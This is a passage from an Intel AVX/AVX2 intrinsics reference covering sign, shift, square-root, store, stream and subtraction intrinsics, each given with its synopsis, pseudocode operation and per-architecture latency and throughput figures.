FOR j := 0 to 15 i := j*16 IF b[i+15:i] < 0 dst[i+15:i] := NEG(a[i+15:i]) ELSE IF b[i+15:i] = 0 dst[i+15:i] := 0 ELSE dst[i+15:i] := a[i+15:i] FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 0.5
vpsignd
__m256i _mm256_sign_epi32 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_sign_epi32 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpsignd ymm, ymm, ymm
CPUID Flags: AVX2

Description

Negate packed 32-bit integers in a when the corresponding signed 32-bit integer in b is negative, and store the results in dst. Element in dst are zeroed out when the corresponding element in b is zero.

Operation

FOR j := 0 to 7 i := j*32 IF b[i+31:i] < 0 dst[i+31:i] := NEG(a[i+31:i]) ELSE IF b[i+31:i] = 0 dst[i+31:i] := 0 ELSE dst[i+31:i] := a[i+31:i] FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 0.5
vpsignb
__m256i _mm256_sign_epi8 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_sign_epi8 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpsignb ymm, ymm, ymm
CPUID Flags: AVX2

Description

Negate packed 8-bit integers in a when the corresponding signed 8-bit integer in b is negative, and store the results in dst. Element in dst are zeroed out when the corresponding element in b is zero.

Operation

FOR j := 0 to 31 i := j*8 IF b[i+7:i] < 0 dst[i+7:i] := NEG(a[i+7:i]) ELSE IF b[i+7:i] = 0 dst[i+7:i] := 0 ELSE dst[i+7:i] := a[i+7:i] FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 0.5
vpsllw
__m256i _mm256_sll_epi16 (__m256i a, __m128i count)

Synopsis

__m256i _mm256_sll_epi16 (__m256i a, __m128i count)
#include «immintrin.h»
Instruction: vpsllw ymm, ymm, xmm
CPUID Flags: AVX2

Description

Shift packed 16-bit integers in a left by count while shifting in zeros, and store the results in dst.

Operation

FOR j := 0 to 15 i := j*16 IF count[63:0] > 15 dst[i+15:i] := 0 ELSE dst[i+15:i] := ZeroExtend(a[i+15:i] << count[63:0]) FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 4 0.5
Haswell 4
vpslld
__m256i _mm256_sll_epi32 (__m256i a, __m128i count)

Synopsis

__m256i _mm256_sll_epi32 (__m256i a, __m128i count)
#include «immintrin.h»
Instruction: vpslld ymm, ymm, xmm
CPUID Flags: AVX2

Description

Shift packed 32-bit integers in a left by count while shifting in zeros, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 IF count[63:0] > 31 dst[i+31:i] := 0 ELSE dst[i+31:i] := ZeroExtend(a[i+31:i] << count[63:0]) FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 4 0.5
vpsllq
__m256i _mm256_sll_epi64 (__m256i a, __m128i count)

Synopsis

__m256i _mm256_sll_epi64 (__m256i a, __m128i count)
#include «immintrin.h»
Instruction: vpsllq ymm, ymm, xmm
CPUID Flags: AVX2

Description

Shift packed 64-bit integers in a left by count while shifting in zeros, and store the results in dst.

Operation

FOR j := 0 to 3 i := j*64 IF count[63:0] > 63 dst[i+63:i] := 0 ELSE dst[i+63:i] := ZeroExtend(a[i+63:i] << count[63:0]) FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 4 0.5
vpsllw
__m256i _mm256_slli_epi16 (__m256i a, int imm8)

Synopsis

__m256i _mm256_slli_epi16 (__m256i a, int imm8)
#include «immintrin.h»
Instruction: vpsllw ymm, ymm, imm
CPUID Flags: AVX2

Description

Shift packed 16-bit integers in a left by imm8 while shifting in zeros, and store the results in dst.

Operation

FOR j := 0 to 15 i := j*16 IF imm8[7:0] > 15 dst[i+15:i] := 0 ELSE dst[i+15:i] := ZeroExtend(a[i+15:i] << imm8[7:0]) FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
Haswell 1
vpslld
__m256i _mm256_slli_epi32 (__m256i a, int imm8)

Synopsis

__m256i _mm256_slli_epi32 (__m256i a, int imm8)
#include «immintrin.h»
Instruction: vpslld ymm, ymm, imm
CPUID Flags: AVX2

Description

Shift packed 32-bit integers in a left by imm8 while shifting in zeros, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 IF imm8[7:0] > 31 dst[i+31:i] := 0 ELSE dst[i+31:i] := ZeroExtend(a[i+31:i] << imm8[7:0]) FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpsllq
__m256i _mm256_slli_epi64 (__m256i a, int imm8)

Synopsis

__m256i _mm256_slli_epi64 (__m256i a, int imm8)
#include «immintrin.h»
Instruction: vpsllq ymm, ymm, imm
CPUID Flags: AVX2

Description

Shift packed 64-bit integers in a left by imm8 while shifting in zeros, and store the results in dst.

Operation

FOR j := 0 to 3 i := j*64 IF imm8[7:0] > 63 dst[i+63:i] := 0 ELSE dst[i+63:i] := ZeroExtend(a[i+63:i] << imm8[7:0]) FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpslldq
__m256i _mm256_slli_si256 (__m256i a, const int imm8)

Synopsis

__m256i _mm256_slli_si256 (__m256i a, const int imm8)
#include «immintrin.h»
Instruction: vpslldq ymm, ymm, imm
CPUID Flags: AVX2

Description

Shift 128-bit lanes in a left by imm8 bytes while shifting in zeros, and store the results in dst.

Operation

tmp := imm8[7:0] IF tmp > 15 tmp := 16 FI dst[127:0] := a[127:0] << (tmp*8) dst[255:128] := a[255:128] << (tmp*8) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpsllvd
__m128i _mm_sllv_epi32 (__m128i a, __m128i count)

Synopsis

__m128i _mm_sllv_epi32 (__m128i a, __m128i count)
#include «immintrin.h»
Instruction: vpsllvd xmm, xmm, xmm
CPUID Flags: AVX2

Description

Shift packed 32-bit integers in a left by the amount specified by the corresponding element in count while shifting in zeros, and store the results in dst.

Operation

FOR j := 0 to 3 i := j*32 dst[i+31:i] := ZeroExtend(a[i+31:i] << count[i+31:i]) ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 2 2
vpsllvd
__m256i _mm256_sllv_epi32 (__m256i a, __m256i count)

Synopsis

__m256i _mm256_sllv_epi32 (__m256i a, __m256i count)
#include «immintrin.h»
Instruction: vpsllvd ymm, ymm, ymm
CPUID Flags: AVX2

Description

Shift packed 32-bit integers in a left by the amount specified by the corresponding element in count while shifting in zeros, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := ZeroExtend(a[i+31:i] << count[i+31:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 2 2
vpsllvq
__m128i _mm_sllv_epi64 (__m128i a, __m128i count)

Synopsis

__m128i _mm_sllv_epi64 (__m128i a, __m128i count)
#include «immintrin.h»
Instruction: vpsllvq xmm, xmm, xmm
CPUID Flags: AVX2

Description

Shift packed 64-bit integers in a left by the amount specified by the corresponding element in count while shifting in zeros, and store the results in dst.

Operation

FOR j := 0 to 1 i := j*64 dst[i+63:i] := ZeroExtend(a[i+63:i] << count[i+63:i]) ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpsllvq
__m256i _mm256_sllv_epi64 (__m256i a, __m256i count)

Synopsis

__m256i _mm256_sllv_epi64 (__m256i a, __m256i count)
#include «immintrin.h»
Instruction: vpsllvq ymm, ymm, ymm
CPUID Flags: AVX2

Description

Shift packed 64-bit integers in a left by the amount specified by the corresponding element in count while shifting in zeros, and store the results in dst.

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := ZeroExtend(a[i+63:i] << count[i+63:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vsqrtpd
__m256d _mm256_sqrt_pd (__m256d a)

Synopsis

__m256d _mm256_sqrt_pd (__m256d a)
#include «immintrin.h»
Instruction: vsqrtpd ymm, ymm
CPUID Flags: AVX

Description

Compute the square root of packed double-precision (64-bit) floating-point elements in a, and store the results in dst.

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := SQRT(a[i+63:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 35 28
Ivy Bridge 35 28
Sandy Bridge 43 44
vsqrtps
__m256 _mm256_sqrt_ps (__m256 a)

Synopsis

__m256 _mm256_sqrt_ps (__m256 a)
#include «immintrin.h»
Instruction: vsqrtps ymm, ymm
CPUID Flags: AVX

Description

Compute the square root of packed single-precision (32-bit) floating-point elements in a, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := SQRT(a[i+31:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 21 14
Ivy Bridge 21 14
Sandy Bridge 29 28
vpsraw
__m256i _mm256_sra_epi16 (__m256i a, __m128i count)

Synopsis

__m256i _mm256_sra_epi16 (__m256i a, __m128i count)
#include «immintrin.h»
Instruction: vpsraw ymm, ymm, xmm
CPUID Flags: AVX2

Description

Shift packed 16-bit integers in a right by count while shifting in sign bits, and store the results in dst.

Operation

FOR j := 0 to 15 i := j*16 IF count[63:0] > 15 dst[i+15:i] := SignBit ELSE dst[i+15:i] := SignExtend(a[i+15:i] >> count[63:0]) FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 4
vpsrad
__m256i _mm256_sra_epi32 (__m256i a, __m128i count)

Synopsis

__m256i _mm256_sra_epi32 (__m256i a, __m128i count)
#include «immintrin.h»
Instruction: vpsrad ymm, ymm, xmm
CPUID Flags: AVX2

Description

Shift packed 32-bit integers in a right by count while shifting in sign bits, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 IF count[63:0] > 31 dst[i+31:i] := SignBit ELSE dst[i+31:i] := SignExtend(a[i+31:i] >> count[63:0]) FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 4
vpsraw
__m256i _mm256_srai_epi16 (__m256i a, int imm8)

Synopsis

__m256i _mm256_srai_epi16 (__m256i a, int imm8)
#include «immintrin.h»
Instruction: vpsraw ymm, ymm, imm
CPUID Flags: AVX2

Description

Shift packed 16-bit integers in a right by imm8 while shifting in sign bits, and store the results in dst.

Operation

FOR j := 0 to 15 i := j*16 IF imm8[7:0] > 15 dst[i+15:i] := SignBit ELSE dst[i+15:i] := SignExtend(a[i+15:i] >> imm8[7:0]) FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpsrad
__m256i _mm256_srai_epi32 (__m256i a, int imm8)

Synopsis

__m256i _mm256_srai_epi32 (__m256i a, int imm8)
#include «immintrin.h»
Instruction: vpsrad ymm, ymm, imm
CPUID Flags: AVX2

Description

Shift packed 32-bit integers in a right by imm8 while shifting in sign bits, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 IF imm8[7:0] > 31 dst[i+31:i] := SignBit ELSE dst[i+31:i] := SignExtend(a[i+31:i] >> imm8[7:0]) FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpsravd
__m128i _mm_srav_epi32 (__m128i a, __m128i count)

Synopsis

__m128i _mm_srav_epi32 (__m128i a, __m128i count)
#include «immintrin.h»
Instruction: vpsravd xmm, xmm, xmm
CPUID Flags: AVX2

Description

Shift packed 32-bit integers in a right by the amount specified by the corresponding element in count while shifting in sign bits, and store the results in dst.

Operation

FOR j := 0 to 3 i := j*32 dst[i+31:i] := SignExtend(a[i+31:i] >> count[i+31:i]) ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 2
vpsravd
__m256i _mm256_srav_epi32 (__m256i a, __m256i count)

Synopsis

__m256i _mm256_srav_epi32 (__m256i a, __m256i count)
#include «immintrin.h»
Instruction: vpsravd ymm, ymm, ymm
CPUID Flags: AVX2

Description

Shift packed 32-bit integers in a right by the amount specified by the corresponding element in count while shifting in sign bits, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := SignExtend(a[i+31:i] >> count[i+31:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 2
vpsrlw
__m256i _mm256_srl_epi16 (__m256i a, __m128i count)

Synopsis

__m256i _mm256_srl_epi16 (__m256i a, __m128i count)
#include «immintrin.h»
Instruction: vpsrlw ymm, ymm, xmm
CPUID Flags: AVX2

Description

Shift packed 16-bit integers in a right by count while shifting in zeros, and store the results in dst.

Operation

FOR j := 0 to 15 i := j*16 IF count[63:0] > 15 dst[i+15:i] := 0 ELSE dst[i+15:i] := ZeroExtend(a[i+15:i] >> count[63:0]) FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 4
vpsrld
__m256i _mm256_srl_epi32 (__m256i a, __m128i count)

Synopsis

__m256i _mm256_srl_epi32 (__m256i a, __m128i count)
#include «immintrin.h»
Instruction: vpsrld ymm, ymm, xmm
CPUID Flags: AVX2

Description

Shift packed 32-bit integers in a right by count while shifting in zeros, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 IF count[63:0] > 31 dst[i+31:i] := 0 ELSE dst[i+31:i] := ZeroExtend(a[i+31:i] >> count[63:0]) FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 4
vpsrlq
__m256i _mm256_srl_epi64 (__m256i a, __m128i count)

Synopsis

__m256i _mm256_srl_epi64 (__m256i a, __m128i count)
#include «immintrin.h»
Instruction: vpsrlq ymm, ymm, xmm
CPUID Flags: AVX2

Description

Shift packed 64-bit integers in a right by count while shifting in zeros, and store the results in dst.

Operation

FOR j := 0 to 3 i := j*64 IF count[63:0] > 63 dst[i+63:i] := 0 ELSE dst[i+63:i] := ZeroExtend(a[i+63:i] >> count[63:0]) FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 4
vpsrlw
__m256i _mm256_srli_epi16 (__m256i a, int imm8)

Synopsis

__m256i _mm256_srli_epi16 (__m256i a, int imm8)
#include «immintrin.h»
Instruction: vpsrlw ymm, ymm, imm
CPUID Flags: AVX2

Description

Shift packed 16-bit integers in a right by imm8 while shifting in zeros, and store the results in dst.

Operation

FOR j := 0 to 15 i := j*16 IF imm8[7:0] > 15 dst[i+15:i] := 0 ELSE dst[i+15:i] := ZeroExtend(a[i+15:i] >> imm8[7:0]) FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpsrld
__m256i _mm256_srli_epi32 (__m256i a, int imm8)

Synopsis

__m256i _mm256_srli_epi32 (__m256i a, int imm8)
#include «immintrin.h»
Instruction: vpsrld ymm, ymm, imm
CPUID Flags: AVX2

Description

Shift packed 32-bit integers in a right by imm8 while shifting in zeros, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 IF imm8[7:0] > 31 dst[i+31:i] := 0 ELSE dst[i+31:i] := ZeroExtend(a[i+31:i] >> imm8[7:0]) FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpsrlq
__m256i _mm256_srli_epi64 (__m256i a, int imm8)

Synopsis

__m256i _mm256_srli_epi64 (__m256i a, int imm8)
#include «immintrin.h»
Instruction: vpsrlq ymm, ymm, imm
CPUID Flags: AVX2

Description

Shift packed 64-bit integers in a right by imm8 while shifting in zeros, and store the results in dst.

Operation

FOR j := 0 to 3 i := j*64 IF imm8[7:0] > 63 dst[i+63:i] := 0 ELSE dst[i+63:i] := ZeroExtend(a[i+63:i] >> imm8[7:0]) FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpsrldq
__m256i _mm256_srli_si256 (__m256i a, const int imm8)

Synopsis

__m256i _mm256_srli_si256 (__m256i a, const int imm8)
#include «immintrin.h»
Instruction: vpsrldq ymm, ymm, imm
CPUID Flags: AVX2

Description

Shift 128-bit lanes in a right by imm8 bytes while shifting in zeros, and store the results in dst.

Operation

tmp := imm8[7:0] IF tmp > 15 tmp := 16 FI dst[127:0] := a[127:0] >> (tmp*8) dst[255:128] := a[255:128] >> (tmp*8) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpsrlvd
__m128i _mm_srlv_epi32 (__m128i a, __m128i count)

Synopsis

__m128i _mm_srlv_epi32 (__m128i a, __m128i count)
#include «immintrin.h»
Instruction: vpsrlvd xmm, xmm, xmm
CPUID Flags: AVX2

Description

Shift packed 32-bit integers in a right by the amount specified by the corresponding element in count while shifting in zeros, and store the results in dst.

Operation

FOR j := 0 to 3 i := j*32 dst[i+31:i] := ZeroExtend(a[i+31:i] >> count[i+31:i]) ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 2
vpsrlvd
__m256i _mm256_srlv_epi32 (__m256i a, __m256i count)

Synopsis

__m256i _mm256_srlv_epi32 (__m256i a, __m256i count)
#include «immintrin.h»
Instruction: vpsrlvd ymm, ymm, ymm
CPUID Flags: AVX2

Description

Shift packed 32-bit integers in a right by the amount specified by the corresponding element in count while shifting in zeros, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := ZeroExtend(a[i+31:i] >> count[i+31:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 2
vpsrlvq
__m128i _mm_srlv_epi64 (__m128i a, __m128i count)

Synopsis

__m128i _mm_srlv_epi64 (__m128i a, __m128i count)
#include «immintrin.h»
Instruction: vpsrlvq xmm, xmm, xmm
CPUID Flags: AVX2

Description

Shift packed 64-bit integers in a right by the amount specified by the corresponding element in count while shifting in zeros, and store the results in dst.

Operation

FOR j := 0 to 1 i := j*64 dst[i+63:i] := ZeroExtend(a[i+63:i] >> count[i+63:i]) ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpsrlvq
__m256i _mm256_srlv_epi64 (__m256i a, __m256i count)

Synopsis

__m256i _mm256_srlv_epi64 (__m256i a, __m256i count)
#include «immintrin.h»
Instruction: vpsrlvq ymm, ymm, ymm
CPUID Flags: AVX2

Description

Shift packed 64-bit integers in a right by the amount specified by the corresponding element in count while shifting in zeros, and store the results in dst.

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := ZeroExtend(a[i+63:i] >> count[i+63:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vmovapd
void _mm256_store_pd (double * mem_addr, __m256d a)

Synopsis

void _mm256_store_pd (double * mem_addr, __m256d a)
#include «immintrin.h»
Instruction: vmovapd m256, ymm
CPUID Flags: AVX

Description

Store 256-bits (composed of 4 packed double-precision (64-bit) floating-point elements) from a into memory. mem_addr must be aligned on a 32-byte boundary or a general-protection exception may be generated.

Operation

MEM[mem_addr+255:mem_addr] := a[255:0]
vmovaps
void _mm256_store_ps (float * mem_addr, __m256 a)

Synopsis

void _mm256_store_ps (float * mem_addr, __m256 a)
#include «immintrin.h»
Instruction: vmovaps m256, ymm
CPUID Flags: AVX

Description

Store 256-bits (composed of 8 packed single-precision (32-bit) floating-point elements) from a into memory. mem_addr must be aligned on a 32-byte boundary or a general-protection exception may be generated.

Operation

MEM[mem_addr+255:mem_addr] := a[255:0]
vmovdqa
void _mm256_store_si256 (__m256i * mem_addr, __m256i a)

Synopsis

void _mm256_store_si256 (__m256i * mem_addr, __m256i a)
#include «immintrin.h»
Instruction: vmovdqa m256, ymm
CPUID Flags: AVX

Description

Store 256-bits of integer data from a into memory. mem_addr must be aligned on a 32-byte boundary or a general-protection exception may be generated.

Operation

MEM[mem_addr+255:mem_addr] := a[255:0]
vmovupd
void _mm256_storeu_pd (double * mem_addr, __m256d a)

Synopsis

void _mm256_storeu_pd (double * mem_addr, __m256d a)
#include «immintrin.h»
Instruction: vmovupd m256, ymm
CPUID Flags: AVX

Description

Store 256-bits (composed of 4 packed double-precision (64-bit) floating-point elements) from a into memory. mem_addr does not need to be aligned on any particular boundary.

Operation

MEM[mem_addr+255:mem_addr] := a[255:0]
vmovups
void _mm256_storeu_ps (float * mem_addr, __m256 a)

Synopsis

void _mm256_storeu_ps (float * mem_addr, __m256 a)
#include «immintrin.h»
Instruction: vmovups m256, ymm
CPUID Flags: AVX

Description

Store 256-bits (composed of 8 packed single-precision (32-bit) floating-point elements) from a into memory. mem_addr does not need to be aligned on any particular boundary.

Operation

MEM[mem_addr+255:mem_addr] := a[255:0]
vmovdqu
void _mm256_storeu_si256 (__m256i * mem_addr, __m256i a)

Synopsis

void _mm256_storeu_si256 (__m256i * mem_addr, __m256i a)
#include «immintrin.h»
Instruction: vmovdqu m256, ymm
CPUID Flags: AVX

Description

Store 256-bits of integer data from a into memory. mem_addr does not need to be aligned on any particular boundary.

Operation

MEM[mem_addr+255:mem_addr] := a[255:0]
void _mm256_storeu2_m128 (float* hiaddr, float* loaddr, __m256 a)

Synopsis

void _mm256_storeu2_m128 (float* hiaddr, float* loaddr, __m256 a)
#include «immintrin.h»
CPUID Flags: AVX

Description

Store the high and low 128-bit halves (each composed of 4 packed single-precision (32-bit) floating-point elements) from a into memory two different 128-bit locations. hiaddr and loaddr do not need to be aligned on any particular boundary.

Operation

MEM[loaddr+127:loaddr] := a[127:0] MEM[hiaddr+127:hiaddr] := a[255:128]
void _mm256_storeu2_m128d (double* hiaddr, double* loaddr, __m256d a)

Synopsis

void _mm256_storeu2_m128d (double* hiaddr, double* loaddr, __m256d a)
#include «immintrin.h»
CPUID Flags: AVX

Description

Store the high and low 128-bit halves (each composed of 2 packed double-precision (64-bit) floating-point elements) from a into memory two different 128-bit locations. hiaddr and loaddr do not need to be aligned on any particular boundary.

Operation

MEM[loaddr+127:loaddr] := a[127:0] MEM[hiaddr+127:hiaddr] := a[255:128]
void _mm256_storeu2_m128i (__m128i* hiaddr, __m128i* loaddr, __m256i a)

Synopsis

void _mm256_storeu2_m128i (__m128i* hiaddr, __m128i* loaddr, __m256i a)
#include «immintrin.h»
CPUID Flags: AVX

Description

Store the high and low 128-bit halves (each composed of integer data) from a into memory two different 128-bit locations. hiaddr and loaddr do not need to be aligned on any particular boundary.

Operation

MEM[loaddr+127:loaddr] := a[127:0] MEM[hiaddr+127:hiaddr] := a[255:128]
vmovntdqa
__m256i _mm256_stream_load_si256 (__m256i const* mem_addr)

Synopsis

__m256i _mm256_stream_load_si256 (__m256i const* mem_addr)
#include «immintrin.h»
Instruction: vmovntdqa ymm, m256
CPUID Flags: AVX2

Description

Load 256-bits of integer data from memory into dst using a non-temporal memory hint. mem_addr must be aligned on a 32-byte boundary or a general-protection exception may be generated.

Operation

dst[255:0] := MEM[mem_addr+255:mem_addr] dst[MAX:256] := 0
vmovntpd
void _mm256_stream_pd (double * mem_addr, __m256d a)

Synopsis

void _mm256_stream_pd (double * mem_addr, __m256d a)
#include «immintrin.h»
Instruction: vmovntpd m256, ymm
CPUID Flags: AVX

Description

Store 256-bits (composed of 4 packed double-precision (64-bit) floating-point elements) from a into memory using a non-temporal memory hint.mem_addr must be aligned on a 32-byte boundary or a general-protection exception may be generated.

Operation

MEM[mem_addr+255:mem_addr] := a[255:0]
vmovntps
void _mm256_stream_ps (float * mem_addr, __m256 a)

Synopsis

void _mm256_stream_ps (float * mem_addr, __m256 a)
#include «immintrin.h»
Instruction: vmovntps m256, ymm
CPUID Flags: AVX

Description

Store 256-bits (composed of 8 packed single-precision (32-bit) floating-point elements) from a into memory using a non-temporal memory hint.mem_addr must be aligned on a 32-byte boundary or a general-protection exception may be generated.

Operation

MEM[mem_addr+255:mem_addr] := a[255:0]
vmovntdq
void _mm256_stream_si256 (__m256i * mem_addr, __m256i a)

Synopsis

void _mm256_stream_si256 (__m256i * mem_addr, __m256i a)
#include «immintrin.h»
Instruction: vmovntdq m256, ymm
CPUID Flags: AVX

Description

Store 256-bits of integer data from a into memory using a non-temporal memory hint. mem_addr must be aligned on a 32-byte boundary or a general-protection exception may be generated.

Operation

MEM[mem_addr+255:mem_addr] := a[255:0]
vpsubw
__m256i _mm256_sub_epi16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_sub_epi16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpsubw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Subtract packed 16-bit integers in b from packed 16-bit integers in a, and store the results in dst.

Operation

FOR j := 0 to 15 i := j*16 dst[i+15:i] := a[i+15:i] — b[i+15:i] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpsubd
__m256i _mm256_sub_epi32 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_sub_epi32 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpsubd ymm, ymm, ymm
CPUID Flags: AVX2

Description

Subtract packed 32-bit integers in b from packed 32-bit integers in a, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := a[i+31:i] — b[i+31:i] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpsubq
__m256i _mm256_sub_epi64 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_sub_epi64 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpsubq ymm, ymm, ymm
CPUID Flags: AVX2

Description

Subtract packed 64-bit integers in b from packed 64-bit integers in a, and store the results in dst.

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := a[i+63:i] — b[i+63:i] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpsubb
__m256i _mm256_sub_epi8 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_sub_epi8 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpsubb ymm, ymm, ymm
CPUID Flags: AVX2

Description

Subtract packed 8-bit integers in b from packed 8-bit integers in a, and store the results in dst.

Operation

FOR j := 0 to 31 i := j*8 dst[i+7:i] := a[i+7:i] — b[i+7:i] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vsubpd
__m256d _mm256_sub_pd (__m256d a, __m256d b)

Synopsis

__m256d _mm256_sub_pd (__m256d a, __m256d b)
#include «immintrin.h»
Instruction: vsubpd ymm, ymm, ymm
CPUID Flags: AVX

Description

Subtract packed double-precision (64-bit) floating-point elements in b from packed double-precision (64-bit) floating-point elements in a, and store the results in dst.

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := a[i+63:i] — b[i+63:i] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3 1
Ivy Bridge 3 1
Sandy Bridge 3 1
vsubps
__m256 _mm256_sub_ps (__m256 a, __m256 b)

Synopsis

__m256 _mm256_sub_ps (__m256 a, __m256 b)
#include «immintrin.h»
Instruction: vsubps ymm, ymm, ymm
CPUID Flags: AVX

Description

Subtract packed single-precision (32-bit) floating-point elements in b from packed single-precision (32-bit) floating-point elements in a, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := a[i+31:i] — b[i+31:i] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3 1
Ivy Bridge 3 1
Sandy Bridge 3 1
vpsubsw
__m256i _mm256_subs_epi16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_subs_epi16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpsubsw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Subtract packed 16-bit integers in b from packed 16-bit integers in a using saturation, and store the results in dst.

Operation

FOR j := 0 to 15 i := j*16 dst[i+15:i] := Saturate_To_Int16(a[i+15:i] — b[i+15:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpsubsb
__m256i _mm256_subs_epi8 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_subs_epi8 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpsubsb ymm, ymm, ymm
CPUID Flags: AVX2

Description

Subtract packed 8-bit integers in b from packed 8-bit integers in a using saturation, and store the results in dst.

Operation

FOR j := 0 to 31 i := j*8 dst[i+7:i] := Saturate_To_Int8(a[i+7:i] — b[i+7:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpsubusw
__m256i _mm256_subs_epu16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_subs_epu16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpsubusw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Subtract packed unsigned 16-bit integers in b from packed unsigned 16-bit integers in a using saturation, and store the results in dst.

Operation

FOR j := 0 to 15 i := j*16 dst[i+15:i] := Saturate_To_UnsignedInt16(a[i+15:i] — b[i+15:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpsubusb
__m256i _mm256_subs_epu8 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_subs_epu8 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpsubusb ymm, ymm, ymm
CPUID Flags: AVX2

Description

Subtract packed unsigned 8-bit integers in b from packed unsigned 8-bit integers in a using saturation, and store the results in dst.

Operation

FOR j := 0 to 31 i := j*8 dst[i+7:i] := Saturate_To_UnsignedInt8(a[i+7:i] — b[i+7:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vtestpd
int _mm_testc_pd (__m128d a, __m128d b)

Synopsis

int _mm_testc_pd (__m128d a, __m128d b)
#include «immintrin.h»
Instruction: vtestpd xmm, xmm
CPUID Flags: AVX

Description

